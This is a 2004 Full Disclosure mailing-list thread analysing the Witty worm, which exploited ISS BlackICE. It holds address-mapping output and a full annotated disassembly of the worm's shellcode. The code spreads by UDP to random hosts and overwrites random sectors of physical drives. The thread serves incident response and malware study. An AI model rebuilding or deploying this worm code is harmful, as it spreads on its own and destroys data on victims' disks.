Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

RE: Any dissasemblies of the Witty worm yet?
From: "Disclosure From OSSI" <disclosure () ossecurity ca>
Date: Sat, 20 Mar 2004 23:47:21 -0500

From the quick analysis of this worm (retrieved from
http://isc.incidents.org/diary.html?date=2004-03-20), it seems that it bears
strange similarity with SQL Slammer for the following points:

1.      It uses the same "push ascii" format as SQL Slammer, for example "push
6B636F73h" in this worm.
2.      It uses hard-coded import addresses (listed below) as SQL Slammer.
3.      If someone can trace the origin of this worm, it might shed light on the
origin of SQL Slammer as well?
4.      When SQL Slammer hit, some suspected that LION
(http://www.cnhonker.com/index.php) did it and he refused the credit. From
the latest articles on the http://www.cnhonker.com/index.php website, LION
is probably not the person who released SQL Slammer, if and only if the
writer of "witty" worm is the same writer for SQL Slammer since Lion's
methods for importing functions are much more sophisticated than hard-coded
import addresses shown in this worm.

If I have time, I might provide a run-time analysis (and dissembly) of this
worm within the context of blackd.exe. For now, just match up the addresses
used in the dissembly by Kostya.

Peter Huang
http://www.ossecurity.ca/

 = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = = =

Analyze exploit file c:\temp\temp.bin with size 0000040f

Found: offset 000000ef value 5e0d409c in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d409c:
       Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

Found: offset 00000106 value 5e0d4098 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4098:
       Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

Found: offset 00000121 value 5e0d4098 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4098:
       Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

Found: offset 0000014a value 5e0d4098 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4098:
       Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

Found: offset 00000164 value 5e0d409c in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d409c:
       Rva 000d409c is address of import fx: KERNEL32.dll!GetModuleHandleA

Found: offset 0000017f value 5e0d4098 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4098:
       Rva 000d4098 is address of import fx: KERNEL32.dll!GetProcAddress

Found: offset 00000241 value 5e0d40dc in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d40dc:
       Rva 000d40dc is address of import fx: KERNEL32.dll!CreateFileA

Found: offset 0000027a value 5e0d40c4 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d40c4:
       Rva 000d40c4 is address of import fx: KERNEL32.dll!SetFilePointer

Found: offset 00000294 value 5e0d4094 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4094:
       Rva 000d4094 is address of import fx: KERNEL32.dll!WriteFile

Found: offset 0000029c value 5e0d4038 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e0d4038:
       Rva 000d4038 is address of import fx: KERNEL32.dll!CloseHandle

EntryPoint Info:
Found: offset 000002a7 value 5e077663 in module C:\Program
Files\ISS\BlackICE\iss-pam1.dll
       Datails about 5e077663:
       Rva 00077663 value 0759e4ff
       5E077663: FF E4                         jmpn        esp

-----Original Message-----
From: Kostya Kortchinsky [mailto:kostya.kortchinsky () renater fr]
Sent: Saturday, March 20, 2004 12:39 PM
To: bugtraq () securityfocus com
Subject: Re: Any dissasemblies of the Witty worm yet?



Here is some preliminary work, I don't claim it to be exact, since
the API calls are guessed at the moment (I still have to get BlackICE),
but it should give a pretty good idea on how the thing work.

The WriteFile might be ReadFile (which is the way Symantec sees it in
their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
the memory at 0x5e000000 might be code section, then not writeable)
makes me think it writes arbitrary places of random physical disks -
with the consequences one can imagine.

Correct me if I am wrong, I would like to receive feedback about this.

Regards,

Kostya Kortchinsky
CERT RENATER

Nicholas Weaver wrote:

    Has anyone done a dissassembly of the "Witty" worm yet?

http://isc.incidents.org/diary.html?date=2004-03-20

http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.
worm.html

    using the
http://seclists.org/lists/bugtraq/2004/Mar/0181.html
    recent bug in BlackICE/RealSecure?

    We are seeing a lot of activity from this worm, although even
a small infection would generate a LOT of traffic (a side-effect of
bandwidth-limited worms, such as single-packet UDP worms).

    Thanks.


seg000:000000D1                   ;
------------------------------------------------------------------
---------
seg000:000000D1
seg000:000000D1                   loc_D1:
   ; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7                             mov     edi, esp
seg000:000000D3 8B 7F 14                          mov     edi, [edi+14h]
seg000:000000D6 83 C7 08                          add     edi, 8
seg000:000000D9 81 C4 E8 FD FF FF                 add     esp, 0FFFFFDE8h
seg000:000000DF 31 C9                             xor     ecx, ecx
seg000:000000E1 66 B9 33 32                       mov     cx, 3233h
   ; 32
seg000:000000E5 51                                push    ecx
seg000:000000E6 68 77 73 32 5F                    push    5F327377h
   ; ws2_
seg000:000000EB 54                                push    esp
seg000:000000EC                                   db      3Eh
seg000:000000EC 3E FF 15 9C 40 0D+                call    dword ptr
ds:5E0D409Ch ; Probably LoadLibrary
seg000:000000F3 89 C3                             mov     ebx, eax
seg000:000000F5 31 C9                             xor     ecx, ecx
seg000:000000F7 66 B9 65 74                       mov     cx, 7465h
   ; et
seg000:000000FB 51                                push    ecx
seg000:000000FC 68 73 6F 63 6B                    push    6B636F73h
   ; sock
seg000:00000101 54                                push    esp
seg000:00000102 53                                push    ebx
seg000:00000103                                   db      3Eh
seg000:00000103 3E FF 15 98 40 0D+                call    dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000010A 6A 11                             push    11h
   ; IPPROTO_UDP
seg000:0000010C 6A 02                             push    2
   ; SOCK_DGRAM
seg000:0000010E 6A 02                             push    2
   ; AF_INET
seg000:00000110 FF D0                             call    eax
   ; socket()
seg000:00000112 89 C6                             mov     esi, eax
seg000:00000114 31 C9                             xor     ecx, ecx
seg000:00000116 51                                push    ecx
seg000:00000117 68 62 69 6E 64                    push    646E6962h
   ; bind
seg000:0000011C 54                                push    esp
seg000:0000011D 53                                push    ebx
seg000:0000011E                                   db      3Eh
seg000:0000011E 3E FF 15 98 40 0D+                call    dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000125 31 C9                             xor     ecx, ecx
seg000:00000127 51                                push    ecx
seg000:00000128 51                                push    ecx
seg000:00000129 51                                push    ecx
   ; sin.sin_addr.s_addr = INADDR_ANY
seg000:0000012A 81 E9 FE FF F0 5F                 sub     ecx, 5FF0FFFEh
  ; 0xa00f0002
seg000:00000130 51                                push    ecx
   ; sin.sin_family = AF_INET
seg000:00000130
   ; sin.sin_port = htons(4000)
seg000:00000131 89 E1                             mov     ecx, esp
seg000:00000133 6A 10                             push    10h
   ; sizeof(struct sockaddr)
seg000:00000135 51                                push    ecx
   ; &sin
seg000:00000136 56                                push    esi
   ; s
seg000:00000137 FF D0                             call    eax
   ; bind()
seg000:00000139 31 C9                             xor     ecx, ecx
seg000:0000013B 66 B9 74 6F                       mov     cx, 6F74h
   ; to
seg000:0000013F 51                                push    ecx
seg000:00000140 68 73 65 6E 64                    push    646E6573h
   ; send
seg000:00000145 54                                push    esp
seg000:00000146 53                                push    ebx
seg000:00000147                                   db      3Eh
seg000:00000147 3E FF 15 98 40 0D+                call    dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000014E 89 C3                             mov     ebx, eax
seg000:00000150 83 C4 3C                          add     esp, 3Ch
seg000:00000153
seg000:00000153                   loc_153:
   ; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9                             xor     ecx, ecx
seg000:00000155 51                                push    ecx
seg000:00000156 68 65 6C 33 32                    push    32336C65h
   ; el32
seg000:0000015B 68 6B 65 72 6E                    push    6E72656Bh
   ; kern
seg000:00000160 54                                push    esp
seg000:00000161                                   db      3Eh
seg000:00000161 3E FF 15 9C 40 0D+                call    dword ptr
ds:5E0D409Ch ; Probably LoadLibrary
seg000:00000168 31 C9                             xor     ecx, ecx
seg000:0000016A 51                                push    ecx
seg000:0000016B 68 6F 75 6E 74                    push    746E756Fh
   ; ount
seg000:00000170 68 69 63 6B 43                    push    436B6369h
   ; ickC
seg000:00000175 68 47 65 74 54                    push    54746547h
   ; GetT
seg000:0000017A 54                                push    esp
seg000:0000017B 50                                push    eax
seg000:0000017C                                   db      3Eh
seg000:0000017C 3E FF 15 98 40 0D+                call    dword ptr
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000183 FF D0                             call    eax
   ; GetTickCount()
seg000:00000185 89 C5                             mov     ebp, eax
seg000:00000187 83 C4 1C                          add     esp, 1Ch
seg000:0000018A 31 C9                             xor     ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF                 sub     ecx,
0FFFFB1E0h ; 0x4e20
seg000:00000192
seg000:00000192                   loc_192:
   ; CODE XREF: seg000:000001F8j
seg000:00000192
   ; seg000:00000255j
seg000:00000192 51                                push    ecx
seg000:00000193 31 C0                             xor     eax, eax
seg000:00000195 2D 03 BC FC FF                    sub     eax,
0FFFCBC03h ; 0x343fd
seg000:0000019A F7 E5                             mul     ebp
seg000:0000019C 2D 3D 61 D9 FF                    sub     eax,
0FFD9613Dh ; 0x269ec3
seg000:000001A1 89 C1                             mov     ecx, eax
   ; rand() function, without the 0x7fff mask, shift coming afterwards
seg000:000001A1
   ; srand() done with GetTickCount()
seg000:000001A3 31 C0                             xor     eax, eax
seg000:000001A5 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001AA F7 E1                             mul     ecx
seg000:000001AC 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001B1 89 C5                             mov     ebp, eax
seg000:000001B3 31 D2                             xor     edx, edx
seg000:000001B5 52                                push    edx
seg000:000001B6 52                                push    edx
seg000:000001B7 C1 E9 10                          shr     ecx, 10h
seg000:000001BA 66 89 C8                          mov     ax, cx
seg000:000001BD 50                                push    eax
   ; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0                             xor     eax, eax
seg000:000001C0 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001C5 F7 E5                             mul     ebp
seg000:000001C7 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001CC 89 C5                             mov     ebp, eax
seg000:000001CE 30 E4                             xor     ah, ah
seg000:000001D0 B0 02                             mov     al, 2
seg000:000001D2 50                                push    eax
   ; to.sin_family = AF_INET
seg000:000001D2
   ; to.sin_port = rand()
seg000:000001D3 89 E0                             mov     eax, esp
seg000:000001D5 6A 10                             push    10h
   ; sizeof(struct sockaddr)
seg000:000001D7 50                                push    eax
   ; &to
seg000:000001D8 31 C0                             xor     eax, eax
seg000:000001DA 50                                push    eax
   ; flags
seg000:000001DB 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001E0 F7 E5                             mul     ebp
seg000:000001E2 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001E7 89 C5                             mov     ebp, eax
seg000:000001E9 C1 E8 17                          shr     eax, 17h
seg000:000001EC 80 C4 03                          add     ah, 3
seg000:000001EF 50                                push    eax
   ; len = 0x300 + (rand() >> 7)
seg000:000001F0 57                                push    edi
   ; buf
seg000:000001F1 56                                push    esi
   ; s
seg000:000001F2 FF D3                             call    ebx
   ; sendto()
seg000:000001F4 83 C4 10                          add     esp, 10h
seg000:000001F7 59                                pop     ecx
seg000:000001F8 E2 98                             loop    loc_192
seg000:000001FA 31 C0                             xor     eax, eax
seg000:000001FC 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000201 F7 E5                             mul     ebp
seg000:00000203 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:00000208 89 C5                             mov     ebp, eax
seg000:0000020A C1 E8 10                          shr     eax, 10h
seg000:0000020D 80 E4 07                          and     ah, 7
seg000:00000210 80 CC 30                          or      ah, 30h
   ; 0x30 | (rand() & 7)
seg000:00000213 B0 45                             mov     al, 45h ; 'E'
   ; E
seg000:00000215 50                                push    eax
seg000:00000216 68 44 52 49 56                    push    56495244h
   ; DRIV
seg000:0000021B 68 49 43 41 4C                    push    4C414349h
   ; ICAL
seg000:00000220 68 50 48 59 53                    push    53594850h
   ; PHYS
seg000:00000225 68 5C 5C 2E 5C                    push    5C2E5C5Ch
   ; \\.\
seg000:00000225
   ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0                             mov     eax, esp
seg000:0000022C 31 C9                             xor     ecx, ecx
seg000:0000022E 51                                push    ecx
   ; NULL
seg000:0000022F B2 20                             mov     dl, 20h ; ' '
seg000:00000231 C1 E2 18                          shl     edx, 18h
seg000:00000234 52                                push    edx
   ; FILE_FLAG_NO_BUFFERING (0x20000000)
seg000:00000235 6A 03                             push    3
   ; OPEN_EXISTING
seg000:00000237 51                                push    ecx
   ; NULL
seg000:00000238 6A 03                             push    3
   ; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2                             shl     edx, 1
seg000:0000023C 52                                push    edx
   ; GENERIC_WRITE (0x40000000)
seg000:0000023D 50                                push    eax
   ; lpFileName
seg000:0000023E                                   db      3Eh
seg000:0000023E 3E FF 15 DC 40 0D+                call    dword ptr
ds:5E0D40DCh ; Probably CreateFile
seg000:00000245 83 C4 14                          add     esp, 14h
seg000:00000248 31 C9                             xor     ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF                 sub     ecx,
0FFFFB1E0h ; 0x4e20
seg000:00000250 3D FF FF FF FF                    cmp     eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF                 jz      loc_192
seg000:0000025B 56                                push    esi
   ; (saving socket)
seg000:0000025C 89 C6                             mov     esi, eax
seg000:0000025E 31 C0                             xor     eax, eax
seg000:00000260 50                                push    eax
   ; FILE_BEGIN
seg000:00000261 50                                push    eax
   ; NULL
seg000:00000262 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000267 F7 E5                             mul     ebp
seg000:00000269 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:0000026E 89 C5                             mov     ebp, eax
seg000:00000270 D1 E8                             shr     eax, 1
seg000:00000272 66 89 C8                          mov     ax, cx
seg000:00000275 50                                push    eax
   ; (rand() << 15) | 0x4e20
seg000:00000276 56                                push    esi
   ; hFile
seg000:00000277                                   db      3Eh
seg000:00000277 3E FF 15 C4 40 0D+                call    dword ptr
ds:5E0D40C4h ; Probably SetFilePointer
seg000:00000277 5E
   ; (really not sure about this one)
seg000:0000027E 31 C9                             xor     ecx, ecx
seg000:00000280 51                                push    ecx
   ; 0
seg000:00000281 89 E2                             mov     edx, esp
seg000:00000283 51                                push    ecx
   ; NULL
seg000:00000284 52                                push    edx
   ; lpNumberOfBytesWritten
seg000:00000285 B5 80                             mov     ch, 80h ; 'Ç'
seg000:00000287 D1 E1                             shl     ecx, 1
seg000:00000289 51                                push    ecx
   ; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E                             mov     cl, 5Eh ; '^'
seg000:0000028C C1 E1 18                          shl     ecx, 18h
seg000:0000028F 51                                push    ecx
   ; lpBuffer (0x5e000000)
seg000:00000290 56                                push    esi
   ; hFile
seg000:00000291                                   db      3Eh
seg000:00000291 3E FF 15 94 40 0D+                call    dword ptr
ds:5E0D4094h ; Probably WriteFile
seg000:00000298 56                                push    esi
   ; hObject
seg000:00000299                                   db      3Eh
seg000:00000299 3E FF 15 38 40 0D+                call    dword ptr
ds:5E0D4038h ; Probably CloseHandle
seg000:000002A0 5E                                pop     esi
seg000:000002A1 5E                                pop     esi
   ; (restoring socket)
seg000:000002A2 E9 AC FE FF FF                    jmp     loc_153
seg000:000002A2                   ;
------------------------------------------------------------------
---------
seg000:000002A7 63 76 07 5E                       dd 5E077663h
seg000:000002AB                   ;
------------------------------------------------------------------
---------
seg000:000002AB E9 21 FE FF FF                    jmp     loc_D1
seg000:000002AB                   ;
------------------------------------------------------------------
---------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]